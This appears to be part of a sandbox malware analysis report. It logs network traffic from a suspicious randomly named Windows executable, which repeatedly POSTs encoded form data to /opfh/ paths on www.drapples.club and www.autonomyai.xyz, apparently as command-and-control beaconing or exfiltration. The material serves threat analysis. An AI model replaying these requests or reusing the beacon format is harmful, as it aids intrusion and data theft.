3d Data Ascii: R40L6=FvK2NATwSiFNVd5sWH6KVG68eOTnaV7B51DaZ8/Xdf5gNJwetKplj9b8mg6xaF9ScTItn5wbUDIblgyfHjei7f3B8buTFCrqkHflR8JBFPmv5UpieCKf9VdIKGtifT6cxTGJqEUuvINWiIPTntW03ds7THeM+YUhcvEYmDg5JDAMtkVeb0neKLmnWSVsq5UgI8ZuBkTcrSKGAWRRe//vbdJM10H2OUVJt5DWjGE=
May 27, 2024 12:22:55.479209900 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 27 May 2024 10:22:55 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: 3699ca2b-907c-4555-a6ff-b5b7b7d84c7d cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_h81eJFbn4TlnvX499eJj8fuzpnXsJ6dgkOVB+OPiMDN1v5mGD8xX/ZWCT+qDOPZ635PD18fBwmoOxl+gTjtqpQ== set-cookie: parking_session=3699ca2b-907c-4555-a6ff-b5b7b7d84c7d; expires=Mon, 27 May 2024 10:37:55 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 68 38 31 65 4a 46 62 6e 34 54 6c 6e 76 58 34 39 39 65 4a 6a 38 66 75 7a 70 6e 58 73 4a 36 64 67 6b 4f 56 42 2b 4f 50 69 4d 44 4e 31 76 35 6d 47 44 38 78 58 2f 5a 57 43 54 2b 71 44 4f 50 5a 36 33 35 50 44 31 38 66 42 77 6d 6f 4f 78 6c 2b 67 54 6a 74 71 70 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_h81eJFbn4TlnvX499eJj8fuzpnXsJ6dgkOVB+OPiMDN1v5mGD8xX/ZWCT+qDOPZ635PD18fBwmoOxl+gTjtqpQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
May 27, 2024 12:22:55.479232073 CEST	571	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzY5OWNhMmItOTA3Yy00NTU1LWE2ZmYtYjViN2I3ZDg0YzdkIiwicGFnZV90aW1lIjoxNzE2ODA1Mz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.7	63204	199.59.243.225	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:57.778562069 CEST	1747	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.drapples.club Origin: http://www.drapples.club Referer: http://www.drapples.club/opfh/ Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 46 76 4b 32 4e 41 54 77 53 69 46 4e 56 64 35 73 57 48 36 4b 56 47 36 38 65 4f 54 6e 61 56 37 42 35 31 44 61 5a 38 2f 58 64 5a 68 67 4d 34 51 65 2f 35 78 6c 67 39 62 38 36 77 36 77 61 46 39 44 63 56 67 70 6e 35 38 4c 55 46 55 62 2f 43 36 66 47 57 79 69 31 66 33 42 68 4c 75 53 49 69 72 2f 6b 48 50 68 52 38 5a 42 46 50 6d 76 35 53 56 69 5a 58 2b 66 2f 56 64 58 41 6d 74 6d 56 7a 36 30 78 58 69 7a 71 45 67 59 76 37 56 57 6a 6f 66 54 6c 59 43 30 2f 64 73 31 66 6e 65 55 2b 59 51 79 63 76 59 71 6d 41 38 54 4a 41 51 4d 38 68 59 4a 49 67 7a 61 55 39 69 7a 52 51 4d 4f 6f 35 34 54 57 66 5a 56 47 54 2f 6f 69 54 65 37 59 6e 42 53 55 70 2b 67 4e 4f 4e 6b 38 55 72 57 4c 42 77 44 35 71 50 55 77 78 56 44 42 51 67 41 2f 63 45 6c 2f 6c 54 73 4b 41 56 76 2f 59 78 70 64 31 4b 49 6c 33 4a 58 70 4f 53 49 54 6b 73 5a 34 4e 68 53 4a 6b 35 65 4d 6a 30 39 49 7a 4a 38 77 7a 4d 43 64 69 74 79 65 62 36 74 47 51 72 6b 78 38 46 70 67 41 36 66 67 78 32 44 47 58 52 61 53 6a 5a 56 6f 63 6c 50 48 67 4b 53 6d 67 4f 6a [TRUNCATED] Data Ascii: R40L6=FvK2NATwSiFNVd5sWH6KVG68eOTnaV7B51DaZ8/XdZhgM4Qe/5xlg9b86w6waF9DcVgpn58LUFUb/C6fGWyi1f3BhLuSIir/kHPhR8ZBFPmv5SViZX+f/VdXAmtmVz60xXizqEgYv7VWjofTlYC0/ds1fneU+YQycvYqmA8TJAQM8hYJIgzaU9izRQMOo54TWfZVGT/oiTe7YnBSUp+gNONk8UrWLBwD5qPUwxVDBQgA/cEl/lTsKAVv/Yxpd1KIl3JXpOSITksZ4NhSJk5eMj09IzJ8wzMCdityeb6tGQrkx8FpgA6fgx2DGXRaSjZVoclPHgKSmgOj7/SU9zsxpVxpduMytDxbDENgcRkYuQDu3knn+A/d1tY1z0+yTInTd0cW0hoS7qHTpWW7Ggmde/6HYDVsWAPaRNRq+Q7DTssCuY1slNvRf2Qa9hQZTEkokjB2H8zYABZiMOVuN9qNf45s7kernGA/lFogR8Be6uMmyhpkS1/BA+2e42+9NnlCkWsUtaNf79ceE68e2bVslaWy39mNx0IdNuuXGRyAY+5pwN+dqXPGlD+qEQ+6y1lZLRhuHD1MPl6sTiX/mCQ8EX2GFnQxu/AlMEJWkcSQHvB3DAmyGatHwfVhWhnV5Xwc5QevduZtFal/UmtGhntfRkx2Ss5d+nxmd53g/DK0l/Xe0GrgOcXFTIMXbG07hQPvX68oumSUA/X+4UIIQKeUJHgjmXmYy7Rl0iRBn7W0as9xLuYeNF0KPA8UEURL8gLC5GSdulnYuZigqmtPAF86RlygFlsZMph51FlI1iP3VfNn+BgkmxaccFUP2/svAes95H47FXxH0HF/DLtE6IPvbVpr30ptM+kBzJwzznrnESSL0jRWP8/uqU7I/tJ+M4zY5iSqiuMpp6rOfEYf7MWs8QUAQ0955XCRF65IeDpKjaEW2DDOnQrKxwcDXTDDJNLDtMwoSCxet5fJnZaxx1hh4yrSi8Wu4Fi9qsHihFLJBq9IE7 [TRUNCATED]
May 27, 2024 12:22:58.239726067 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 27 May 2024 10:22:57 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: 6cd27e6f-5ecb-4a7e-b6ac-25ea90d14667 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_h81eJFbn4TlnvX499eJj8fuzpnXsJ6dgkOVB+OPiMDN1v5mGD8xX/ZWCT+qDOPZ635PD18fBwmoOxl+gTjtqpQ== set-cookie: parking_session=6cd27e6f-5ecb-4a7e-b6ac-25ea90d14667; expires=Mon, 27 May 2024 10:37:58 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 68 38 31 65 4a 46 62 6e 34 54 6c 6e 76 58 34 39 39 65 4a 6a 38 66 75 7a 70 6e 58 73 4a 36 64 67 6b 4f 56 42 2b 4f 50 69 4d 44 4e 31 76 35 6d 47 44 38 78 58 2f 5a 57 43 54 2b 71 44 4f 50 5a 36 33 35 50 44 31 38 66 42 77 6d 6f 4f 78 6c 2b 67 54 6a 74 71 70 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_h81eJFbn4TlnvX499eJj8fuzpnXsJ6dgkOVB+OPiMDN1v5mGD8xX/ZWCT+qDOPZ635PD18fBwmoOxl+gTjtqpQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
May 27, 2024 12:22:58.239746094 CEST	571	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmNkMjdlNmYtNWVjYi00YTdlLWI2YWMtMjVlYTkwZDE0NjY3IiwicGFnZV90aW1lIjoxNzE2ODA1Mz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.7	63205	199.59.243.225	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:23:00.502659082 CEST	457	OUT	GET /opfh/?R40L6=ItiWO1iWeFtHa8hPek+OcHyLbef7ZgLT8jCYd//+XcZZdI8PxrJa9smp+DWZYnBxcEEGiLIUcWsNzCqVKSWt292FhOiPAibVi2DXZfZ1Bcb5xD1zZxmn+AopE2U6Sy6WzAqAlkUlqKwq&b2PX=hZXl7VFPKl04 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.drapples.club Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
May 27, 2024 12:23:00.995928049 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 27 May 2024 10:23:00 GMT content-type: text/html; charset=utf-8 content-length: 1518 x-request-id: 698d1947-8f52-4b93-bddb-02b4f84e0098 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mTCglIAGYg+5xF57z9+Jba+JXqVR0BIkX9FqTRK3vIWGbpAr46KQnPIzWkbCClWjJMhmnocAvYlRObAr/1GhSg== set-cookie: parking_session=698d1947-8f52-4b93-bddb-02b4f84e0098; expires=Mon, 27 May 2024 10:38:00 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6d 54 43 67 6c 49 41 47 59 67 2b 35 78 46 35 37 7a 39 2b 4a 62 61 2b 4a 58 71 56 52 30 42 49 6b 58 39 46 71 54 52 4b 33 76 49 57 47 62 70 41 72 34 36 4b 51 6e 50 49 7a 57 6b 62 43 43 6c 57 6a 4a 4d 68 6d 6e 6f 63 41 76 59 6c 52 4f 62 41 72 2f 31 47 68 53 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mTCglIAGYg+5xF57z9+Jba+JXqVR0BIkX9FqTRK3vIWGbpAr46KQnPIzWkbCClWjJMhmnocAvYlRObAr/1GhSg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
May 27, 2024 12:23:00.995959044 CEST	971	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjk4ZDE5NDctOGY1Mi00YjkzLWJkZGItMDJiNGY4NGUwMDk4IiwicGFnZV90aW1lIjoxNzE2ODA1Mz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.7	63206	3.33.130.190	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:23:06.049832106 CEST	717	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.autonomyai.xyz Origin: http://www.autonomyai.xyz Referer: http://www.autonomyai.xyz/opfh/ Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 7a 6a 42 36 2b 7a 6a 70 6b 47 47 70 48 49 39 78 58 38 63 47 64 79 4c 53 65 55 33 44 70 38 6a 34 71 4b 71 61 4a 4d 72 6e 4d 4f 32 37 68 6a 36 47 66 6d 47 2b 42 6b 4c 54 41 34 50 46 46 54 4d 7a 30 56 48 6c 6c 44 52 51 32 33 43 73 6a 45 61 45 4f 41 6b 76 30 32 71 4a 51 62 46 73 70 76 41 69 35 4b 35 54 66 67 38 31 51 62 6f 71 53 32 59 42 65 55 58 62 77 38 77 74 51 65 52 53 55 42 45 55 4a 5a 30 72 75 71 74 50 4b 64 34 55 43 35 37 32 58 51 57 47 36 57 47 62 37 73 7a 33 57 34 6d 64 62 35 30 67 5a 41 64 5a 59 59 77 6a 4b 4e 4f 69 52 63 74 58 4f 38 4d 75 6f 72 4d 63 78 6d 63 2f 4a 47 53 77 44 69 54 34 46 37 33 52 39 38 69 74 70 67 3d 3d Data Ascii: R40L6=zjB6+zjpkGGpHI9xX8cGdyLSeU3Dp8j4qKqaJMrnMO27hj6GfmG+BkLTA4PFFTMz0VHllDRQ23CsjEaEOAkv02qJQbFspvAi5K5Tfg81QboqS2YBeUXbw8wtQeRSUBEUJZ0ruqtPKd4UC572XQWG6WGb7sz3W4mdb50gZAdZYYwjKNOiRctXO8MuorMcxmc/JGSwDiT4F73R98itpg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.7	63207	3.33.130.190	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:23:09.550307989 CEST	737	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.autonomyai.xyz Origin: http://www.autonomyai.xyz Referer: http://www.autonomyai.xyz/opfh/ Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 7a 6a 42 36 2b 7a 6a 70 6b 47 47 70 46 70 4e 78 52 66 30 47 4b 43 4c 54 55 30 33 44 6e 63 6a 30 71 4b 32 61 4a 4e 2f 33 4e 38 53 37 67 44 4b 47 65 6c 65 2b 41 6b 4c 54 4c 59 50 45 50 7a 4d 6b 30 56 62 44 6c 42 46 51 32 33 57 73 6a 45 71 45 50 78 6b 77 30 6d 71 48 59 37 46 75 6b 50 41 69 35 4b 35 54 66 6b 55 62 51 62 67 71 53 46 77 42 63 78 72 63 75 73 77 73 54 65 52 53 5a 68 45 51 4a 5a 31 2b 75 76 30 48 4b 59 38 55 43 39 2f 32 58 44 4f 46 74 47 47 52 6b 63 79 45 52 34 33 6b 57 6f 4a 65 55 68 31 46 66 6f 51 77 50 37 54 41 4c 2b 68 37 51 74 30 56 73 70 6f 71 6d 41 42 4b 4c 48 57 6f 4f 41 6e 5a 61 4d 53 37 77 75 44 70 2f 55 79 57 79 5a 36 6b 4a 73 55 73 65 4e 4a 66 78 59 4d 64 37 5a 30 3d Data Ascii: R40L6=zjB6+zjpkGGpFpNxRf0GKCLTU03Dncj0qK2aJN/3N8S7gDKGele+AkLTLYPEPzMk0VbDlBFQ23WsjEqEPxkw0mqHY7FukPAi5K5TfkUbQbgqSFwBcxrcuswsTeRSZhEQJZ1+uv0HKY8UC9/2XDOFtGGRkcyER43kWoJeUh1FfoQwP7TAL+h7Qt0VspoqmABKLHWoOAnZaMS7wuDp/UyWyZ6kJsUseNJfxYMd7Z0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.7	63208	3.33.130.190	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:23:12.082437038 CEST	1750	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.autonomyai.xyz Origin: http://www.autonomyai.xyz Referer: http://www.autonomyai.xyz/opfh/ Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 7a 6a 42 36 2b 7a 6a 70 6b 47 47 70 46 70 4e 78 52 66 30 47 4b 43 4c 54 55 30 33 44 6e 63 6a 30 71 4b 32 61 4a 4e 2f 33 4e 38 61 37 67 79 71 47 66 46 69 2b 44 6b 4c 54 49 59 50 4a 50 7a 4d 63 30 56 44 50 6c 42 35 6d 32 31 75 73 78 31 4b 45 49 46 77 77 36 6d 71 48 55 62 46 76 70 76 41 33 35 4b 4a 66 66 67 77 62 51 62 67 71 53 44 4d 42 59 6b 58 63 73 73 77 74 51 65 52 67 55 42 45 38 4a 5a 4d 4a 75 72 70 6c 4e 73 49 55 43 64 76 32 61 52 57 46 79 32 47 58 6e 63 79 63 52 34 37 46 57 6f 45 76 55 68 42 2f 66 72 41 77 4e 73 2f 61 51 2f 78 44 53 62 59 66 74 62 73 66 68 69 4a 6a 4b 6c 50 51 47 51 69 39 65 75 2b 64 31 2b 71 6f 71 45 6e 4e 69 59 69 58 52 74 67 44 58 36 6b 41 72 61 41 69 34 63 62 7a 76 57 43 43 6e 50 7a 7a 56 69 32 4c 72 6a 64 53 49 4e 6b 34 58 6e 50 4a 35 32 63 32 62 47 69 2f 45 73 4d 53 61 49 34 75 7a 51 4b 51 79 6d 6a 49 51 6b 6e 67 74 33 2f 75 31 33 34 76 6b 53 37 49 62 4c 30 47 45 55 70 78 51 38 61 2f 47 68 66 36 4b 38 35 38 6a 32 76 47 6c 72 71 6e 65 43 4b 4a 34 42 53 58 [TRUNCATED] Data Ascii: R40L6=zjB6+zjpkGGpFpNxRf0GKCLTU03Dncj0qK2aJN/3N8a7gyqGfFi+DkLTIYPJPzMc0VDPlB5m21usx1KEIFww6mqHUbFvpvA35KJffgwbQbgqSDMBYkXcsswtQeRgUBE8JZMJurplNsIUCdv2aRWFy2GXncycR47FWoEvUhB/frAwNs/aQ/xDSbYftbsfhiJjKlPQGQi9eu+d1+qoqEnNiYiXRtgDX6kAraAi4cbzvWCCnPzzVi2LrjdSINk4XnPJ52c2bGi/EsMSaI4uzQKQymjIQkngt3/u134vkS7IbL0GEUpxQ8a/Ghf6K858j2vGlrqneCKJ4BSXlCb2oBjBQz8ONMlYhqjZGnofEoYITlK6d2oSLL0it0nTscj35Zj0Ng0p033tJR0558VUHHMbDhQKWli3HqTGf+e1buoYbaEtq+W16dccRPymjp/l1WiTRHcSLPSGSF5ImAo8+1b/LGJhbGHgpmXjnIsAg5TT+fPPfEOyH0QGrzTSKHP7ErtiJlwi1LntJU/vthbErzZdkgQauIUClR/KDIDWVhPRA1ZfIjLvq+rHr+a/xX+A30rUAD68eGCYnXo7tvP4fHjyja5neEbtVUfWd+m6YSr/M/JtKSEI49DB/udaRPBJpwJvNKnNwTfTr82YvErmyAfs5DDPeq26hjr+FfcZcnKiQvptZ88nebJwF//xjkkHImUYDI1To9CcXaGgWLEotUMJt1uqetT0Zp2Z5c25qesthwGTCfvkrbouStdafFPlffxwvRxgByeBreZDWIUbW1lOWSYRDmchKAlWnKe4JvcVNdIGFADcwaMbA5u+wZNwl2zkDxdN1XH93Uk6thhcaJxN8qZWdT9mhwoJp53Ijclc4OX2WG361NhcXl8bsBG5yTVhzTsP0nyFQxSO+8DUDmpLlF69LaFaVol9NYwAafjd2zPIBtEd3eSkc+84EcdHsgR5J5zzWRQNbj1A2KPxNGZVk8a9h/DeL/E3BqhZ0U2TtcGK4T [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.7	63209	3.33.130.190	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:23:14.615155935 CEST	458	OUT	GET /opfh/?R40L6=+hpa9HKLtxeYEKNNXPI5VBSfdFDUoaiCusvmIOnHC/L+zjqEV17vBkaVEMb7DgIovUP6hhFd7FyMm1q4LBIs3FeHHcdJlscr/I16R146dIQqVis5Y3/utpIuSORveCYceuc/vKNgK8Bg&b2PX=hZXl7VFPKl04 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.autonomyai.xyz Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
May 27, 2024 12:23:15.085428953 CEST	419	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 27 May 2024 10:23:15 GMT Content-Type: text/html Content-Length: 279 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 52 34 30 4c 36 3d 2b 68 70 61 39 48 4b 4c 74 78 65 59 45 4b 4e 4e 58 50 49 35 56 42 53 66 64 46 44 55 6f 61 69 43 75 73 76 6d 49 4f 6e 48 43 2f 4c 2b 7a 6a 71 45 56 31 37 76 42 6b 61 56 45 4d 62 37 44 67 49 6f 76 55 50 36 68 68 46 64 37 46 79 4d 6d 31 71 34 4c 42 49 73 33 46 65 48 48 63 64 4a 6c 73 63 72 2f 49 31 36 52 31 34 36 64 49 51 71 56 69 73 35 59 33 2f 75 74 70 49 75 53 4f 52 76 65 43 59 63 65 75 63 2f 76 4b 4e 67 4b 38 42 67 26 62 32 50 58 3d 68 5a 58 